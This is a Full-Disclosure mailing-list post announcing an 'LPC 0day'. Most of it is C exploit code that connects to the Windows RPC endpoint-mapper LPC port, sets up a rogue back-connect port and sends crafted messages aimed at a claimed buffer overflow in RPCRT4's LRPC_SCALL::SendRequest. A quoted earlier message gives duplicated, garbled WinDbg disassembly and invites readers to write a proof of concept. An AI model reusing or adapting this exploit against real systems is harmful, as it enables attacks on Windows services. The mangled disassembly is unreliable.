[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] LPC 0day



 

 

#include <windows.h>
#include <stdio.h>
//#include "ntdll.h"

//#pragma  comment(lib,"ntdll.lib")
#pragma  comment(lib,"advapi32.lib")

 

typedef enum _PROCESSINFOCLASS {
ProcessDebugPort=7// 7 Y Y
} PROCESSINFOCLASS;

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING ,*PUNICODE_STRING;

typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID;

#define PORT_NAME_LEN               64

#define LRPC_CONNECT_REQUEST     0
#define LPC_CONNECTION_REQUEST   10

#define    offset    0x100+0x4-0x6*4
#define    MAXLEN    0x148
#define    BACKNAME  L"\\RPC Control\\back2"
#define    RPCLPCNAME L"\\RPC Control\\epmapper"
#define    BINDNAME  L"back2"

typedef struct _LRPC_BIND_EXCHANGE
{
    INT                ConnectType ;
    DWORD         AssocKey ;
    char              szPortName[PORT_NAME_LEN] ; 
    RPC_SYNTAX_IDENTIFIER InterfaceId;
    RPC_SYNTAX_IDENTIFIER TransferSyntax;
    RPC_STATUS RpcStatus;
    unsigned char fBindBack ;
    unsigned char fNewSecurityContext ;
    unsigned char fNewPresentationContext;
    unsigned char PresentationContext;
    unsigned char Pad[3];
    unsigned long SecurityContextId;
} LRPC_BIND_EXCHANGE;

typedef struct _LPC_MESSAGE 
{
  USHORT                  DataSize;
  USHORT                  MessageSize;
  USHORT                  MessageType;
  USHORT                  DataInfoOffset;
  CLIENT_ID               ClientId;
  ULONG                   MessageId;
  ULONG                   SectionSize;
//  UCHAR                      Data[];
}LPC_MESSAGE, *PLPC_MESSAGE;


typedef struct _OBJECT_ATTRIBUTES
{
    DWORD           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    DWORD           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;


typedef 
DWORD
(CALLBACK * NTCREATEPORT)(

  OUT PHANDLE             PortHandle,
  IN POBJECT_ATTRIBUTES   ObjectAttributes,
  IN ULONG                MaxConnectInfoLength,
  IN ULONG                MaxDataLength,
  IN OUT PULONG           Reserved OPTIONAL );

typedef 
DWORD
(CALLBACK * NTREPLYWAITRECVIVEPORT)(

  IN HANDLE               PortHandle,
  OUT PHANDLE             ReceivePortHandle OPTIONAL,
  IN PLPC_MESSAGE         Reply OPTIONAL,
  OUT PLPC_MESSAGE        IncomingRequest );


typedef
DWORD
(CALLBACK * NTACCEPTCONNECTPORT) (
    OUT PHANDLE PortHandle,
    IN PVOID PortContext OPTIONAL,
    IN PLPC_MESSAGE ConnectionRequest,
    IN BOOLEAN AcceptConnection,
    IN OUT int int1, //    IN OUT PPORT_VIEW ServerView OPTIONAL,
    OUT int int2  //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
    );

typedef 
DWORD
(CALLBACK * NTCONNECTPORT)(
    OUT PHANDLE PortHandle,
    IN PUNICODE_STRING PortName,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
    IN OUT int int1, 
 //    IN OUT PPORT_VIEW ClientView OPTIONAL,
    IN OUT int int2,
 // IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
    OUT PULONG MaxMessageLength OPTIONAL,
    IN OUT PVOID ConnectionInformation OPTIONAL,
    IN OUT PULONG ConnectionInformationLength OPTIONAL
  );

typedef 
DWORD

(CALLBACK *NTREQUESTWAITREPLYPORT)(   // NtRequestWaitReplyPort(

  IN  HANDLE               PortHandle,
  IN  PLPC_MESSAGE         Request,
  OUT PLPC_MESSAGE        IncomingReply );

typedef 
DWORD
(CALLBACK *NTCOMPLETECONNECTPORT) (
    IN HANDLE PortHandle
    );

typedef 
DWORD
(CALLBACK *RTLINITUNICODESTRING)(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
    );

typedef 
DWORD
(CALLBACK * NTREPLYPORT)(

  IN HANDLE               PortHandle,
  IN PLPC_MESSAGE         Reply );

typedef 
DWORD
(CALLBACK * NTSETINFORMATIONPROCESS)(

  IN HANDLE               ProcessHandle,
  IN PROCESSINFOCLASS ProcessInformationClass,
  IN PVOID                ProcessInformation,
  IN ULONG                ProcessInformationLength );


typedef struct _DEBUG_MESSAGE
{
    LPC_MESSAGE        PORT_MSG;
    DEBUG_EVENT        DebugEvent;
}DEBUG_MESSAGE, *PDEBUG_MESSAGE;


NTSETINFORMATIONPROCESS    NtSetInformationProcess;
NTREPLYWAITRECVIVEPORT     NtReplyWaitReceivePort;
NTCREATEPORT               NtCreatePort;
NTREPLYPORT                NtReplyPort;

NTCONNECTPORT              NtConnectPort;
RTLINITUNICODESTRING       RtlInitUnicodeString;
NTREQUESTWAITREPLYPORT     NtRequestWaitReplyPort;
NTACCEPTCONNECTPORT        NtAcceptConnectPort;
NTCOMPLETECONNECTPORT      NtCompleteConnectPort;


template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
UCHAR Data[i];
};

PROCESS_INFORMATION    pi;

int   server();
void  initapi();

int main()
{

// LPC_MESSAGE         Reply;
//    HMODULE hNtdll;    
//    DWORD    dwAddrList[9];
    BOOL    bExit = FALSE;
//    DWORD    dwRet;
//    HANDLE    hPort;
    int        k=0;
 unsigned   long i;
//    DEBUG_MESSAGE dm;
    OBJECT_ATTRIBUTES oa = {sizeof(oa)};
    PORT_MESSAGEX<0x130> PortReply,PortRecv;
    STARTUPINFO    si={sizeof(si)};

   // NTSTATUS
 int  Status;

 

 PLPC_MESSAGE        Request;
// PLPC_MESSAGE        IncomingReply;
 LPC_MESSAGE         Message;

 HANDLE LsaCommandPortHandle;
    UNICODE_STRING LsaCommandPortName;
    SECURITY_QUALITY_OF_SERVICE DynamicQos;
 LRPC_BIND_EXCHANGE BindExchange;
 DWORD Key=0x11223344;

    unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
 BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
    BindExchange.AssocKey = Key;
//    wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);

 DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
    DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; 
//SECURITY_DYNAMIC_TRACKING;
    DynamicQos.EffectiveOnly = TRUE;

    initapi();    

    printf( "\r\nwindows lpc test!\r\n");


 CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i); 
 


 //
    // Connect to the Reference Monitor Command Port.  This port
    // is used to send commands from the LSA to the Reference Monitor.
    //

    RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);

    Status = NtConnectPort(
                 &LsaCommandPortHandle,
                 &LsaCommandPortName,
                 &DynamicQos,
                 NULL,
                 NULL,
                 NULL,    // &maxlen,
                 &BindExchange,
                 &BindExchangeLength);

    if ((Status)) {


    exit(Status);

         //print(("LsapRmInitializeServer - Connect to Rm Command Port failed 
0x%lx\n",Status));
        // goto InitServerError;
    }


//    exit(0);
/*
    //create port
    dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
    if(dwRet != 0)
    {
        printf("create hPort failed. ret=%.8X\n", dwRet);
        return 0;
    }
    //create process
    if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
        CREATE_SUSPENDED, 0, 0, &si, &pi))
    {
        printf("CreateProcess failed:%d\n", GetLastError());
        return 0;
    }
    //set debug port
    dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
        &hPort, sizeof(hPort));
    if(dwRet != 0)
    {
        printf("set debug port error:%.8X\n", dwRet);
        return 0;
    }
    //printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId, pi.dwProcessId, 
hPort);
    ResumeThread(pi.hThread);
*/
    while (true) 
    {
        memset(&Message, 0, sizeof(Message));
  
  Message.MessageSize=0x118;
  Message.DataSize=0x100;
  Message.MessageId=0x1122;

  Request=&Message;

 

 

 

    memset(&PortReply, 0, sizeof(PortReply));
        //    memcpy(&PortReply, &dm, sizeof(dm));
           

      memset(&PortReply, 0, sizeof(PortReply));
        //    memcpy(&PortReply, &dm, sizeof(dm));
            PortReply.MessageSize = 0x100;
            PortReply.DataSize = 0x100-0x18;
   PortReply.MessageType=0;
            PortReply.MessageId=0x1122;

            PortReply.Data[0]=0x0b;
            PortReply.Data[1]=0;
   PortReply.Data[2]=0;
   PortReply.Data[3]=0;
   PortReply.Data[4]=0;
            wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);

     Sleep(1000);
        
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); 
//Reply);
      

  
          //  memcpy(&PortReply.Data[offset-4], &dwAddrList, 
sizeof(dwAddrList));

 

    PortReply.MessageSize = 0xa0;
            PortReply.DataSize = 0xa0-0x18;
   PortReply.MessageType=0;
            PortReply.MessageId=0x1122;

            PortReply.Data[0]=0x0;
            PortReply.Data[1]=0;
   PortReply.Data[2]=0;
   PortReply.Data[3]=0;
   PortReply.Data[4]=0;
            memcpy((unsigned char *)&(PortReply.Data[0x0c]),
       
"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
   
//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);


          //  memcpy(&PortReply.Data[offset-4], &dwAddrList, 
sizeof(dwAddrList));
          
   _asm{
  // die: jmp die
   }
   Sleep(1000);
        
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); 
//Reply);
 BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);


            if (!(Status))
   {
    while(1){
       PortReply.MessageSize = 0x100;
                PortReply.DataSize = 0x100-0x18;
       PortReply.MessageType=0;
                PortReply.MessageId=PortRecv.MessageId;

                PortReply.Data[0]=0x01;
                PortReply.Data[1]=0;
       PortReply.Data[2]=0;
       PortReply.Data[3]=0;
       PortReply.Data[4]=0x3;
    PortReply.Data[5]=0;
    PortReply.Data[6]=0;

   
    
                *(int *)(&(PortReply.Data[0x18]))=*(int 
*)(&(PortRecv.Data[0x30]));

 

   _asm{
// die: jmp die 

   }
               Sleep(100);
           
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); 
//Reply);
    
           
          Sleep(0x7fffffff);

    }
   }
 } 


 
    return 0;
}


int server()
{

   BOOL    bExit = FALSE;
    DWORD    dwRet;
//    HANDLE    hPort;
    int        k=0;
 unsigned   long maxlen;
  //  DEBUG_MESSAGE dm;
    OBJECT_ATTRIBUTES oa = {sizeof(oa)};
    PORT_MESSAGEX<0x130> PortReply,PortRecv;
    STARTUPINFO    si={sizeof(si)};

   // NTSTATUS
 int  Status;

 

 PLPC_MESSAGE        Request;
 PLPC_MESSAGE        IncomingReply;
 LPC_MESSAGE         Message;

 HANDLE BackPortHandle,NewHandle,NewAccHandle;
    UNICODE_STRING BackPortName;
    SECURITY_QUALITY_OF_SERVICE DynamicQos;
 LRPC_BIND_EXCHANGE BindExchange;
 DWORD Key=0x11223344;
    unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
 BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
    BindExchange.AssocKey = Key;


 DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
    DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; 
//SECURITY_DYNAMIC_TRACKING;
    DynamicQos.EffectiveOnly = TRUE;

    

    
 


    RtlInitUnicodeString( &BackPortName,BACKNAME); 
 memset(&oa,0,sizeof(oa));
    oa.Length=0x18;
 oa.ObjectName=&BackPortName;
 oa.Attributes=0x40;


    //InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
  //OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);

    
    //create port
    dwRet = NtCreatePort(&BackPortHandle, &oa, 
sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0);
    if(dwRet != 0)
    {
        printf("create hPort failed. ret=%.8X\n", dwRet);
       // return 0;
    }
    
    while (true) 
    {
        memset(&Message, 0, sizeof(Message));
  
  Message.MessageSize=0x118;
  Message.DataSize=0x100;
  Message.MessageId=0x11;

  Request=&Message;

      memset(&PortReply, 0, sizeof(PortReply));
        //    memcpy(&PortReply, &dm, sizeof(dm));
            PortReply.MessageSize = 0x148;
            PortReply.DataSize = 0x130;
   PortReply.MessageType=0;

            PortReply.Data[0]=0x0b;
            PortReply.Data[1]=0;
   PortReply.Data[2]=0;
   PortReply.Data[3]=0;
   PortReply.Data[4]=0;

 

          //  memcpy(&PortReply.Data[offset-4], &dwAddrList, 
sizeof(dwAddrList));
         
        Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv); //Reply);
        if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
  {

  Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
  Status=NtCompleteConnectPort (NewAccHandle);
  
      memset(&PortRecv, 0, sizeof(PortRecv));
        
   Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); 
//&PortReply,&PortRecv);
  
   while(1)
   {
   PortRecv.MessageSize = 0x148;
            PortRecv.DataSize = 0x130;
   
  // PortReply.MessageId=PortRecv.MessageId;
            _asm{
//die: jmp die 
   }
   Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv); 
//&PortReply,&PortRecv);
   Sleep(100);
   Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); 
//&PortReply,&PortRecv);
   }

  }

 }
}


void initapi()
{

  HMODULE hNtdll;


    //get native api address
    hNtdll = LoadLibrary("ntdll.dll");
    if(hNtdll == NULL) 
    {
        printf("LoadLibrary failed:%d\n", GetLastError());
    }

    NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
         GetProcAddress(hNtdll, "NtReplyWaitReceivePort");

    NtCreatePort = (NTCREATEPORT)
         GetProcAddress(hNtdll, "NtCreatePort");

    NtReplyPort = (NTREPLYPORT)
         GetProcAddress(hNtdll, "NtReplyPort");

    NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
         GetProcAddress(hNtdll, "NtSetInformationProcess");

 NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
   GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
 
 NtConnectPort  =             (NTCONNECTPORT)
      GetProcAddress(hNtdll, "NtConnectPort");

 NtCompleteConnectPort  =     (NTCOMPLETECONNECTPORT)
      GetProcAddress(hNtdll, "NtCompleteConnectPort");

 NtAcceptConnectPort  =     (NTACCEPTCONNECTPORT)
      GetProcAddress(hNtdll, "NtAcceptConnectPort");

    RtlInitUnicodeString=(RTLINITUNICODESTRING)
         GetProcAddress(hNtdll,"RtlInitUnicodeString");

    
}

 


 


From: yuange1975@xxxxxxxxxxx
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: 0day analysis of the challenges
Date: Tue, 7 Sep 2010 12:38:27 +0000




 
0day analysis of the challenges 

2010-08-05 20:32 2010-08-05 20:32 








The following code has a buffer overflow, please write POC code analysis. Code 
please send to yuange1975@xxxxxxx . 
 
 

0:014> u RPCRT4!LRPC_SCALL::SendRequest 0:014> u RPCRT4! LRPC_SCALL:: 
SendRequest 
RPCRT4!LRPC_SCALL::SendRequest: RPCRT4! LRPC_SCALL:: SendRequest: 
77c4d4e6 8bff            mov     edi,edi 77c4d4e6 8bff mov edi, edi 
77c4d4e8 55              push    ebp 77c4d4e8 55 push ebp 
77c4d4e9 8bec            mov     ebp,esp 77c4d4e9 8bec mov ebp, esp 
77c4d4eb 81ec10010000    sub     esp,110h 77c4d4eb 81ec10010000 sub esp, 110h 
77c4d4f1 a16c86cb77      mov     eax,dword ptr [RPCRT4!__security_cookie 
(77cb86 77c4d4f1 a16c86cb77 mov eax, dword ptr [RPCRT4! __security_cookie 
(77cb86 
6c)] 6c)] 
77c4d4f6 53              push    ebx 77c4d4f6 53 push ebx 
77c4d4f7 56              push    esi 77c4d4f7 56 push esi 
77c4d4f8 8945fc          mov     dword ptr [ebp-4],eax 77c4d4f8 8945fc mov 
dword ptr [ebp-4], eax 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x15: RPCRT4! LRPC_SCALL:: SendRequest +0 x15: 
77c4d4fb 8b450c          mov     eax,dword ptr [ebp+0Ch] 77c4d4fb 8b450c mov 
eax, dword ptr [ebp +0 Ch] 
77c4d4fe 8bf1            mov     esi,ecx 77c4d4fe 8bf1 mov esi, ecx 
77c4d500 33c9            xor     ecx,ecx 77c4d500 33c9 xor ecx, ecx 
77c4d502 57              push    edi 77c4d502 57 push edi 
77c4d503 8b7d08          mov     edi,dword ptr [ebp+8] 77c4d503 8b7d08 mov edi, 
dword ptr [ebp +8] 
77c4d506 bb00200000      mov     ebx,2000h 77c4d506 bb00200000 mov ebx, 2000h 
77c4d50b 8908            mov     dword ptr [eax],ecx 77c4d50b 8908 mov dword 
ptr [eax], ecx 
77c4d50d 855f28          test    dword ptr [edi+28h],ebx 77c4d50d 855f28 test 
dword ptr [edi +28 h], ebx 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x2a: RPCRT4! LRPC_SCALL:: SendRequest +0 x2a: 
77c4d510 8985f0feffff    mov     dword ptr [ebp-110h],eax 77c4d510 8985f0feffff 
mov dword ptr [ebp-110h], eax 
77c4d516 898df8feffff    mov     dword ptr [ebp-108h],ecx 77c4d516 898df8feffff 
mov dword ptr [ebp-108h], ecx 
77c4d51c 0f85422f0100    jne     RPCRT4!LRPC_SCALL::SendRequest+0x38 (77c60464) 
77c4d51c 0f85422f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0 x38 (77c60464) 
77c4d522 8d86d8000000    lea     eax,[esi+0D8h] 77c4d522 8d86d8000000 lea eax, 
[esi +0 D8h] 
77c4d528 3908            cmp     dword ptr [eax],ecx 77c4d528 3908 cmp dword 
ptr [eax], ecx 
77c4d52a 740e            je      RPCRT4!LRPC_SCALL::SendRequest+0xaf (77c4d53a) 
77c4d52a 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 xaf (77c4d53a) 
77c4d52c 398ef8000000    cmp     dword ptr [esi+0F8h],ecx 77c4d52c 398ef8000000 
cmp dword ptr [esi +0 F8h], ecx 
77c4d532 8908            mov     dword ptr [eax],ecx 77c4d532 8908 mov dword 
ptr [eax], ecx 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x75: RPCRT4! LRPC_SCALL:: SendRequest +0 x75: 
77c4d534 0f845a2f0100    je      RPCRT4!LRPC_SCALL::SendRequest+0x77 (77c60494) 
77c4d534 0f845a2f0100 je RPCRT4! LRPC_SCALL:: SendRequest +0 x77 (77c60494) 
77c4d53a 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d53a 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d540 f6401c04        test    byte ptr [eax+1Ch],4 77c4d540 f6401c04 test 
byte ptr [eax +1 Ch], 4 
77c4d544 0f84700f0000    je      RPCRT4!LRPC_SCALL::SendRequest+0x1d8 
(77c4e4ba) 77c4d544 0f84700f0000 je RPCRT4! LRPC_SCALL:: SendRequest +0 x1d8 
(77c4e4ba) 
77c4d54a 668b08          mov     cx,word ptr [eax] 77c4d54a 668b08 mov cx, word 
ptr [eax] 
77c4d54d 6683c118        add     cx,18h 77c4d54d 6683c118 add cx, 18h 
77c4d551 66894802        mov     word ptr [eax+2],cx 77c4d551 66894802 mov word 
ptr [eax +2], cx 
77c4d555 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d555 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0xd0: RPCRT4! LRPC_SCALL:: SendRequest +0 xd0: 
77c4d55b f6401d08        test    byte ptr [eax+1Dh],8 77c4d55b f6401d08 test 
byte ptr [eax +1 Dh], 8 
77c4d55f 0f856c2f0100    jne     RPCRT4!LRPC_SCALL::SendRequest+0xd6 (77c604d1) 
77c4d55f 0f856c2f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0 xd6 (77c604d1) 
77c4d565 c6401802        mov     byte ptr [eax+18h],2 77c4d565 c6401802 mov 
byte ptr [eax +18 h], 2 
77c4d569 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d569 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d56f 8b4f0c          mov     ecx,dword ptr [edi+0Ch] 77c4d56f 8b4f0c mov 
ecx, dword ptr [edi +0 Ch] 
77c4d572 894840          mov     dword ptr [eax+40h],ecx 77c4d572 894840 mov 
dword ptr [eax +40 h], ecx 
77c4d575 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d575 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d57b 8b8eb0000000    mov     ecx,dword ptr [esi+0B0h] 77c4d57b 8b8eb0000000 
mov ecx, dword ptr [esi +0 B0h] 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0xf8: RPCRT4! LRPC_SCALL:: SendRequest +0 xf8: 
77c4d581 894834          mov     dword ptr [eax+34h],ecx 77c4d581 894834 mov 
dword ptr [eax +34 h], ecx 
77c4d584 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d584 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d58a c6401900        mov     byte ptr [eax+19h],0 77c4d58a c6401900 mov 
byte ptr [eax +19 h], 0 
77c4d58e 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d58e 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d594 80480540        or      byte ptr [eax+5],40h 77c4d594 80480540 or byte 
ptr [eax +5], 40h 
77c4d598 8d85fcfeffff    lea     eax,[ebp-104h] 77c4d598 8d85fcfeffff lea eax, 
[ebp-104h] 
77c4d59e 50              push    eax 77c4d59e 50 push eax 
77c4d59f ffb6a4000000    push    dword ptr [esi+0A4h] 77c4d59f ffb6a4000000 
push dword ptr [esi +0 A4h] 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x11c: RPCRT4! LRPC_SCALL:: SendRequest +0 x11c: 
77c4d5a5 8b869c000000    mov     eax,dword ptr [esi+9Ch] 77c4d5a5 8b869c000000 
mov eax, dword ptr [esi +9 Ch] 
77c4d5ab ff7024          push    dword ptr [eax+24h] 77c4d5ab ff7024 push dword 
ptr [eax +24 h] 
77c4d5ae ff15b410c277    call    dword ptr [RPCRT4!_imp__NtRequestWaitReplyPort 
77c4d5ae ff15b410c277 call dword ptr [RPCRT4! _imp__NtRequestWaitReplyPort 
(77c210b4)] (77c210b4)] 
77c4d5b4 8bc8            mov     ecx,eax 77c4d5b4 8bc8 mov ecx, eax 
77c4d5b6 b8000000c0      mov     eax,0C0000000h 77c4d5b6 b8000000c0 mov eax, 
0C0000000h 
77c4d5bb 23c8            and     ecx,eax 77c4d5bb 23c8 and ecx, eax 
77c4d5bd 3bc8            cmp     ecx,eax 77c4d5bd 3bc8 cmp ecx, eax 
77c4d5bf 0f84152f0100    je      RPCRT4!LRPC_SCALL::SendRequest+0x138 
(77c604da) 77c4d5bf 0f84152f0100 je RPCRT4! LRPC_SCALL:: SendRequest +0 x138 
(77c604da) 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x16d: RPCRT4! LRPC_SCALL:: SendRequest +0 x16d: 
77c4d5c5 855f28          test    dword ptr [edi+28h],ebx 77c4d5c5 855f28 test 
dword ptr [edi +28 h], ebx 
77c4d5c8 751f            jne     RPCRT4!LRPC_SCALL::SendRequest+0x191 
(77c4d5e9) 77c4d5c8 751f jne RPCRT4! LRPC_SCALL:: SendRequest +0 x191 
(77c4d5e9) 
77c4d5ca 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d5ca 8b86a4000000 
mov eax, dword ptr [esi +0 A4h] 
77c4d5d0 8a4018          mov     al,byte ptr [eax+18h] 77c4d5d0 8a4018 mov al, 
byte ptr [eax +18 h] 
77c4d5d3 3c10            cmp     al,10h 77c4d5d3 3c10 cmp al, 10h 
77c4d5d5 7412            je      RPCRT4!LRPC_SCALL::SendRequest+0x191 
(77c4d5e9) 77c4d5d5 7412 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191 (77c4d5e9) 
77c4d5d7 3c04            cmp     al,4 77c4d5d7 3c04 cmp al, 4 
77c4d5d9 740e            je      RPCRT4!LRPC_SCALL::SendRequest+0x191 
(77c4d5e9) 77c4d5d9 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 x191 (77c4d5e9) 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x183: RPCRT4! LRPC_SCALL:: SendRequest +0 x183: 
77c4d5db 8b4708          mov     eax,dword ptr [edi+8] 77c4d5db 8b4708 mov eax, 
dword ptr [edi +8] 
77c4d5de 85c0            test    eax,eax 77c4d5de 85c0 test eax, eax 
77c4d5e0 7407            je      RPCRT4!LRPC_SCALL::SendRequest+0x191 
(77c4d5e9) 77c4d5e0 7407 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191 (77c4d5e9) 
77c4d5e2 50              push    eax 77c4d5e2 50 push eax 
77c4d5e3 e80da40000      call    RPCRT4!operator delete (77c579f5) 77c4d5e3 
e80da40000 call RPCRT4! Operator delete (77c579f5) 
77c4d5e8 59              pop     ecx 77c4d5e8 59 pop ecx 
77c4d5e9 80bd14ffffff06 cmp     byte ptr [ebp-0ECh],6 77c4d5e9 80bd14ffffff06 
cmp byte ptr [ebp-0ECh], 6 
77c4d5f0 0f85f60e0000    jne     RPCRT4!LRPC_SCALL::SendRequest+0x1d0 
(77c4e4ec) 77c4d5f0 0f85f60e0000 jne RPCRT4! LRPC_SCALL:: SendRequest +0 x1d0 
(77c4e4ec) 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x19a: RPCRT4! LRPC_SCALL:: SendRequest +0 x19a: 
77c4d5f6 0fbf8516ffffff movsx   eax,word ptr [ebp-0EAh] 77c4d5f6 0fbf8516ffffff 
movsx eax, word ptr [ebp-0EAh] 
77c4d5fd 8b8df0feffff    mov     ecx,dword ptr [ebp-110h] 77c4d5fd 8b8df0feffff 
mov ecx, dword ptr [ebp-110h] 
77c4d603 8901            mov     dword ptr [ecx],eax 77c4d603 8901 mov dword 
ptr [ecx], eax 
77c4d605 8bb5f8feffff    mov     esi,dword ptr [ebp-108h] 77c4d605 8bb5f8feffff 
mov esi, dword ptr [ebp-108h] 
77c4d60b 85f6            test    esi,esi 77c4d60b 85f6 test esi, esi 
77c4d60d 0f85ed2e0100    jne     RPCRT4!LRPC_SCALL::SendRequest+0x1b3 
(77c60500) 77c4d60d 0f85ed2e0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0 x1b3 
(77c60500) 
77c4d613 33c0            xor     eax,eax 77c4d613 33c0 xor eax, eax 
77c4d615 8b4dfc          mov     ecx,dword ptr [ebp-4] 77c4d615 8b4dfc mov ecx, 
dword ptr [ebp-4] 
0:014> u 0:014> u 
RPCRT4!LRPC_SCALL::SendRequest+0x214: RPCRT4! LRPC_SCALL:: SendRequest +0 x214: 
77c4d618 5f              pop     edi 77c4d618 5f pop edi 
77c4d619 5e              pop     esi 77c4d619 5e pop esi 
77c4d61a 5b              pop     ebx 77c4d61a 5b pop ebx 
77c4d61b e810110000      call    RPCRT4!__security_check_cookie (77c4e730) 
77c4d61b e810110000 call RPCRT4! __security_check_cookie (77c4e730) 
77c4d620 c9              leave 77c4d620 c9 leave 
77c4d621 c20800          ret     8 77c4d621 c20800 ret 8 
77c4d624 90              nop 77c4d624 90 nop 
77c4d625 90              nop 77c4d625 90 nop 




 
http://hi.baidu.com/yuange1975/blog/item/022dec5901af02272834f0fc.html
 
                                          
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/